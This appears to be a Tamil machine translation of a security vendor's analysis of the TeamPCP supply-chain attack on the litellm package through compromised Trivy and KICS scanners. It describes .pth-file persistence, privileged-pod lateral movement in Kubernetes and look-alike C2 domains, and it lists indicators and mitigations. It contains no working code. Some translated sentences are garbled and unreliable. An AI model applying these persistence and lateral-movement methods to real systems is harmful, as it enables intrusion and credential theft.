சாத்தியமான AI உதவி: இந்தச் சான்று சேகரிப்பான், AI-உதவியுடனான கணக்கெடுப்பிற்கு இணக்கமான வகையில், கார்டானோ கையொப்பமிடும் சாவிகள், வயர்கார்டு உள்ளமைவுகள் மற்றும் கனிகோ டாக்கர் சான்றுகள் போன்ற குறிப்பிட்ட இலக்குகள் உட்பட 15-க்கும் மேற்பட்ட பிரிவுகளுடன், ஒரு முறையான விரிவான அமைப்பைக் கொண்டுள்ளது. தரவுச் சுமையின் மீள்செயல் வேகம் (வெவ்வேறு குறியாக்கத் திட்டங்களைக் கொண்ட மூன்று வகைகள்), சூழல் அமைப்புகளுக்கு இடையேயான ஒருங்கிணைப்பு (5 நாட்களில் 5 சூழல் அமைப்புகள்), மற்றும் செயல்பாட்டுப் பாதுகாப்பு (விற்பனையாளரைப் போல் ஆள்மாறாட்டம் செய்யும் டொமைன்கள், கலப்பினக் குறியாக்கம், தொலை அளவீடாக மாறுவேடமிட்ட சிஸ்டம்டி நிலைத்தன்மை) ஆகியவை, AI-உதவியுடனான மேம்பாட்டை ஒரு ஆற்றல் பெருக்கியாகப் பிரதிபலிக்கும் அளவிலான செயல்திறனைக் காட்டுகின்றன. இந்த மதிப்பீடு ஒரு ஊகமே; திறமையான இயக்குநர்கள் AI கருவிகள் இல்லாமலேயே இதே போன்ற அளவை அடைய முடியும்.

புதிய TTP-கள் மற்றும் நுட்பங்கள்

1. பாதுகாப்பு கருவி விநியோகச் சங்கிலி நச்சுத்தன்மை (T1195.002 மாறுபாடு)

கீழ்நிலை இலக்குகளை அடைவதற்கான முதல் படியாக, பாதுகாப்பு ஸ்கேனர்களை (ட்ரிவி, கேஐசிஎஸ்) ஊடுருவுவது ஒரு புதிய தீவிர நடவடிக்கையாகும். தாக்குதல் நடத்தியவர் ஒரு லைப்ரரியை மட்டும் ஊடுருவவில்லை — நிறுவனங்கள் பயன்படுத்தும் கருவிகளையே அவர்கள் ஊடுருவியுள்ளனர். கண்டறிய பாதிக்கப்பட்ட நூலகங்கள். இது ஒரு பார்வைப் புலப்படாத நிலையை உருவாக்குகிறது: தீங்கிழைக்கும் குறியீட்டைக் கண்டறிய வேண்டிய ஸ்கேனரே, அதை வழங்கும் பொறிமுறையாகவும் இருக்கிறது.

2. பைதான் .pth கோப்பு நிலைத்தன்மை (T1546)

தி litellm_init.pth பதிப்பு 1.82.8-இல் உள்ள நுட்பம் குறிப்பாக வஞ்சகமானது. பைதான் .pth கோப்புகள் site-packages/ ஒவ்வொரு மொழிபெயர்ப்பி தொடக்கத்திலும் செயலாக்கப்படுகின்றன; தொடங்கும் எந்த வரியும் import குறியீடாகச் செயல்படுத்தப்படுகிறது. பேலோடை ஒரே சங்கிலித் தொடராக இணைப்பதன் மூலம் import இந்தக் கூற்றின்படி, தாக்குதல் நடத்துபவர் litellm இறக்குமதி செய்யப்படும்போது மட்டுமல்லாமல், ஒவ்வொரு பைதான் செயல்முறையிலும் செயலாக்கத்தை அடைகிறார். இதன் பொருள், litellm நிறுவப்பட்டிருந்தாலும் ஒருபோதும் பயன்படுத்தப்படாவிட்டாலும் கூட, அந்தத் தாக்குதல் நிரல் செயல்படுகிறது, மேலும் சமரசம் செய்யப்பட்டதை மாற்றும் சரிசெய்தலையும் அது தாங்கிக்கொள்கிறது. .py சரிபார்க்காமல் கோப்புகள் .pth கோப்புகளை.

3. சிறப்புரிமை பெற்ற பாட் வரிசைப்படுத்தல் வழியாக குபெர்னெட்டஸ் கிளஸ்டர் முழுவதுமான பக்கவாட்டு நகர்வு (T1610, T1611)

ஒவ்வொரு கிளஸ்டர் முனையத்திலும் சிறப்புரிமை பெற்ற பாட்களைத் தானியங்கி முறையில் உருவாக்குதல் — hostPIDhostNetwork, ஹோஸ்ட் கோப்பு முறைமை மவுண்ட், மற்றும் chroot ஒற்றை சமரசம் செய்யப்பட்ட பணிச்சுமையை முழு கிளஸ்டர் சமரசமாக மாற்றுவதற்கு, நிலைத்தன்மையை நிறுவுதல் — கண்டெய்னர் வரிசைப்படுத்தலை (T1610) ஹோஸ்டுக்கு தப்பித்தல் (T1611) உடன் சங்கிலித் தொடராக இணைக்கிறது.

4. விற்பனையாளரைப் போல் ஆள்மாறாட்டம் செய்யும் C2 உள்கட்டமைப்பு

பயன்படுத்தி models.litellm.cloud (எழுத்துருவைப் போல) மற்றும் checkmarx.zone (செக்மார்க்ஸைப் போல) C2/வெளியேற்ற முனையங்களாக இருப்பது, பிணையக் கண்காணிப்பைத் தவிர்ப்பதற்காக வடிவமைக்கப்பட்டுள்ளது. வெளியேறும் தரவுப் போக்குவரத்தை மதிப்பாய்வு செய்யும் SOC ஆய்வாளர்கள், முறையான விற்பனையாளர் டொமைன்கள் போல் தோற்றமளிக்கும் இடங்களுக்கான HTTPS இணைப்புகளைக் காண்பார்கள்.

5. பயணத்தின் போதே பேலோடை விரைவாக மாற்றி அமைத்தல்

முதலில் v1.82.7 பதிப்பை இறக்குமதி நேரச் செயலாக்கத்துடனும், பின்னர் 13 நிமிடங்கள் கழித்து v1.82.8 பதிப்பைத் தொடக்க நேரச் செயலாக்கத்துடனும் வெளியிடுவது, தாக்குதல் நடத்துபவர் நிகழ்நேரத்தில் கண்காணித்துத் தன்னை மாற்றியமைத்துக் கொள்வதைக் காட்டுகிறது. மூலக் குறியீட்டில் பாதுகாக்கப்பட்டுள்ள, கருத்துரைக்கப்பட்ட பேலோட் வகைகள் (வெவ்வேறு குறியாக்கத் திட்டங்களுடன்) செயல்பாட்டின் போது தீவிரமான மேம்பாட்டுப் பணிகள் நடைபெற்றதை உறுதிப்படுத்துகின்றன.

என்ன செய்ய முடியும்

இந்தத் தாக்குதல் ஒவ்வொரு மட்டத்திலும் உள்ள நம்பிக்கையைச் சுரண்டுகிறது: பாதுகாப்பு கருவிகள் மீதான நம்பிக்கை, தொகுப்பு பதிவகங்கள் மீதான நம்பிக்கை, பரிச்சயமான டொமைன்கள் மீதான நம்பிக்கை, CI/CD தானியக்கம். அதைத் தடுப்பதற்கு, இந்த நம்பிக்கை எல்லைகள் ஒவ்வொன்றையும் வலுப்படுத்த வேண்டும்:

தொகுப்பு நுகர்வோருக்காக

  • சார்புகளை வெறும் பதிப்பின் மூலம் மட்டுமல்ல, ஹாஷ் மூலமும் நிலைநிறுத்தவும். pip install litellm==1.82.6 --hash=sha256:... சமரசம் செய்யப்பட்ட பதிப்புகள் சிறிது நேரத்திற்கு சமீபத்திய பதிப்பாகத் தோன்றினாலும், அவை நிறுவப்படுவதைத் தடுத்திருக்கும்.
  • லாக்ஃபைல்களைப் பயன்படுத்தவும். pip-compilepoetry.lock, மற்றும் uv.lock துல்லியமான பதிப்புகளையும் ஹாஷ்களையும் கைப்பற்றுங்கள். CI/CD ஃப்ளோட்டிங் பதிப்பு விவரக்குறிப்புகளிலிருந்து அல்லாமல், லாக்ஃபைல்களிலிருந்து நிறுவ வேண்டும்.
  • கண்காணிக்கவும் .pth கோப்புகளை. தொடர்ந்து தணிக்கை செய்யுங்கள் site-packages/ எதிர்பாராததற்கு .pth கோப்புகள் — அவை ஒவ்வொரு பைதான் தொடக்கத்திலும் இயங்குகின்றன, மேலும் அவை போதிய அளவு அங்கீகரிக்கப்படாத ஒரு நிலைத்தன்மைப் பொறிமுறையாகும்.
  • வெளிச்செல்லும் வலையமைப்புக் கட்டுப்பாடுகளைச் செயல்படுத்தவும். வெளியேற்றம் models.litellm.cloud மற்றும் C2 வாக்கெடுப்பு checkmarx.zone உற்பத்திச் சூழல்களில் அனுமதிப்பட்டியல் அடிப்படையிலான வெளிச்செல்லும் வடிகட்டுதலில் இது பிடிபட்டிருக்கலாம்.

தொகுப்பு பராமரிப்பாளர்களுக்கு

  • முள் CI/CD செயல்கள் மூலம் commit SHA, tag அல்ல. லைட்எல்எல்எம்-இன் pipeline நிலைநிறுத்தப்பட்ட பதிப்பு இல்லாமல் டிரிவியைப் பயன்படுத்தியது. அது மேற்கோள் காட்டியிருந்தால் aquasecurity/trivy-action@<commit-sha> அதற்கு பதிலாக @latestஅவ்வாறு நடந்திருந்தால், சமரசம் செய்யப்பட்ட அந்த நடவடிக்கை செயல்படுத்தப்பட்டிருக்காது.
  • குறுகிய கால, வரையறுக்கப்பட்ட வெளியீட்டு டோக்கன்களைப் பயன்படுத்தவும். PyPI, நம்பகமான வெளியீட்டாளர்களையும் (OIDC-அடிப்படையிலான) மற்றும் வரையறுக்கப்பட்ட API டோக்கன்களையும் ஆதரிக்கிறது. வெளியேற்றப்பட்ட PYPI_PUBLISH டோக்கனுக்கு நீண்ட கால, கட்டுப்பாடற்ற வெளியீட்டு அணுகல் இருந்திருக்கக் கூடாது.
  • PyPI இல் இரு காரணி அங்கீகாரத்தைச் செயல்படுத்துங்கள். அனைத்து பராமரிப்பாளர்களுக்கும் 2FA-ஐக் கட்டாயமாக்குங்கள் மற்றும் முடிந்தவரை வன்பொருள் பாதுகாப்புச் சாவிகளைப் பயன்படுத்துங்கள்.
  • பொதிகளில் கையொப்பமிடுங்கள். Sigstore/PEP 740 சான்றளிப்புகள், ஒரு தொகுப்பு எதிர்பார்க்கப்பட்ட முறையில் உருவாக்கப்பட்டது என்பதை நுகர்வோர் சரிபார்க்க அனுமதிக்கின்றன. CI/CD pipelineதிருடப்பட்ட டோக்கனைக் கொண்ட தாக்குபவரால் அல்ல.

பிளாட்ஃபார்ம் ஆபரேட்டர்களுக்கு (PyPI, npm, GitHub)

  • இயல்புக்கு மாறான வெளியீட்டு முறைகளைக் கண்டறியவும். வழக்கத்தை விட வேறுபட்ட ஐபி அல்லது டோக்கனிலிருந்து, 13 நிமிட இடைவெளியில் வெளியிடப்படும் இரண்டு புதிய பதிப்புகள், அந்தத் தொகுப்பு நிறுவப்படுவதற்கு முன்பு, மதிப்பாய்வுக்காக நிறுத்திவைத்தல் அல்லது தானியங்கு ஸ்கேனிங்கைத் தூண்ட வேண்டும்.
  • நம்பகமான வெளியீட்டாளர்களின் பயன்பாட்டை விரைவுபடுத்துங்கள். OIDC அடிப்படையிலான வெளியீடானது, தொகுப்புகளைக் குறிப்பிட்ட களஞ்சியங்கள் மற்றும் பணிப்பாய்வுகளுடன் பிணைப்பதால், திருடப்பட்ட டோக்கன்கள் அசல் தொகுப்பிற்கு வெளியே பயனற்றதாகிவிடுகின்றன. CI/CD சூழல்.
  • வெளியிடும் நேரத்தில் தீம்பொருள் ஸ்கேனிங்கைச் செயல்படுத்தவும். proxy_server.py இல் உள்ள base64-டிகோட் செய்யப்பட்ட பேலோடை, வெளியிடும் நேரத்தில் நிலையான பகுப்பாய்வு மூலம் கண்டறிய முடியும்.

சுற்றுச்சூழல் அமைப்புக்கு

  • பாதுகாப்புக் கருவிகளை முக்கிய உள்கட்டமைப்பாகக் கருதுங்கள். டிரிவி மற்றும் செக்மார்க்ஸ் கேஐசிஎஸ் மில்லியன் கணக்கானோரால் பயன்படுத்தப்படுகின்றன. pipelineஅவர்கள் ஸ்கேன் செய்யும் பேக்கேஜ்களைப் போலவே, அவர்களின் GitHub Actions-ம் கையொப்பமிடப்பட்டு, பின் செய்யப்பட்டு, அதே கண்டிப்புடன் கண்காணிக்கப்பட வேண்டும்.
  • இயக்க நேரக் கண்டறிதலில் முதலீடு செய்யுங்கள். நிலையான பகுப்பாய்வு மட்டும் ஒவ்வொரு மறைப்பு நுட்பத்தையும் கண்டறிய முடியாது. தொகுப்பு நிறுவலின் இயக்க நேரக் கண்காணிப்பு hooksஎதிர்பாராத பிணைய இணைப்புகள் மற்றும் சந்தேகத்திற்கிடமான கோப்பு அணுகல் முறைகள் ஆகியவை ஆழமான பாதுகாப்பை வழங்குகின்றன.
  • அச்சுறுத்தல் தொடர்பான தகவல்களை விரைவாகப் பகிரவும். பல்வேறு வழங்குநர்களுக்கிடையேயான ஒருங்கிணைப்பு வேகமாக இருந்திருந்தால், litellm-க்கான 5.5 மணி நேர வெளிப்பாட்டுக் காலம் இன்னும் குறைவாக இருந்திருக்கலாம். Xygeni MEW, Socket மற்றும் Snyk போன்ற தானியங்கு ஸ்கேனிங் சேவைகள் இந்தக் கோளாறைக் கண்டறிந்தன — மனித உறுதிப்படுத்தல் மற்றும் பதிவகத்தின் பதிலளிப்பு நேரமே இதில் உள்ள முட்டுக்கட்டையாகும்.

தீர்மானம்

டீம்பிசிபி பிரச்சாரம் ஒரு திருப்புமுனை தருணம் software supply chain securityமுதலில் பாதுகாப்பு ஸ்கேனர்களின் பாதுகாப்பை மீறி, அவற்றை உயர் மதிப்புள்ள செயற்கை நுண்ணறிவு உள்கட்டமைப்பிற்கான படிக்கட்டுகளாகப் பயன்படுத்துவதன் மூலம், விநியோகச் சங்கிலியானது அதன் மிகவும் பலவீனமான இடைவழிச் சார்புநிலையைப் பொறுத்தே வலிமையாக இருக்கும் என்பதையும், அந்தச் சார்புநிலையே உங்களைப் பாதுகாப்பாக வைத்திருக்க நீங்கள் நம்பக்கூடிய ஒரு பாதுகாப்புக் கருவியாக இருக்கக்கூடும் என்பதையும் தாக்குதல் நடத்தியவர்கள் நிரூபித்துள்ளனர்.

லிட்டெல்ம் சமரசம், AI உள்கட்டமைப்பிற்கு அதிகரித்து வரும் அபாயத்தை குறிப்பாக எடுத்துக்காட்டுகிறது. LLM ப்ராக்ஸி கேட்வேக்கள் ஆகும்போது standard மாதிரிக்கான enterprise செயற்கை நுண்ணறிவைப் பயன்படுத்தும்போது, ​​API சாவிகள், கிளவுட் அங்கீகாரச் சான்றுகள் மற்றும் முக்கியமான தரவுகளுக்கான அணுகலை ஒரே கூறில் அவர்கள் ஒருமுகப்படுத்துகிறார்கள். அந்தக் கூறின் பாதுகாப்பை மீறுவது, முழு செயற்கை நுண்ணறிவு அடுக்குக்குமான ஒரு திறவுகோலாக அமைந்துவிடும்.

5.5 மணி நேர கால இடைவெளியில் litellm 1.82.7 அல்லது 1.82.8-ஐ நிறுவிய நிறுவனங்கள், இதை ஒரு முழுமையான நற்சான்றிதழ் மீறலாகக் கருத வேண்டும்: பாதிக்கப்பட்ட கணினிகளில் உள்ள அனைத்து இரகசியங்களையும் மாற்றவும், Kubernetes கிளஸ்டர்களைத் தணிக்கை செய்யவும். node-setup-* காய்களில் kube-systemஎதையும் அகற்றவும் sysmon.service systemd அலகுகளைச் சரிபார்க்கவும். litellm_init.pth பைத்தானில் site-packages/ கோப்பகங்கள். அதிகாரப்பூர்வ டாக்கர் இமேஜின் பயனர்கள் (ghcr.io/berriai/litellmபிம்பம் அதன் சார்புகளை நிலைநிறுத்திக் கொண்டதாலும், வெளிப்பாட்டுக் காலத்தின் போது அது மீண்டும் உருவாக்கப்படாததாலும், அவை பாதிக்கப்படவில்லை.

எழுத்தாளர் பற்றி

இணை நிறுவனர் & CTO

லூயிஸ் ரோட்ரிக்ஸ் இவர் Xygeni Security நிறுவனத்தின் இணை நிறுவனர் மற்றும் தலைமை தொழில்நுட்ப அதிகாரி ஆவார். பயன்பாட்டுப் பாதுகாப்பில் 20 ஆண்டுகளுக்கும் மேலான அனுபவமுள்ள இவர், குழுக்கள் உண்மையான விநியோக அபாயத்தைக் குறைக்க உதவும் AppSec பாதுகாப்பு மற்றும் மேம்பட்ட குறியீடு-பகுப்பாய்வுத் திறன்களில் கவனம் செலுத்துகிறார்.

 
sca-tools-software-composition-analysis-tools
உங்கள் மென்பொருள் அபாயங்களுக்கு முன்னுரிமை அளித்து, சரிசெய்து, பாதுகாக்கவும்.
உங்கள் இலவச கணக்கைப் பெறுங்கள்.
கடன் அட்டை தேவையில்லை.

உங்கள் மென்பொருள் உருவாக்கம் மற்றும் விநியோகத்தைப் பாதுகாக்கவும்

Xygeni தயாரிப்பு தொகுப்புடன்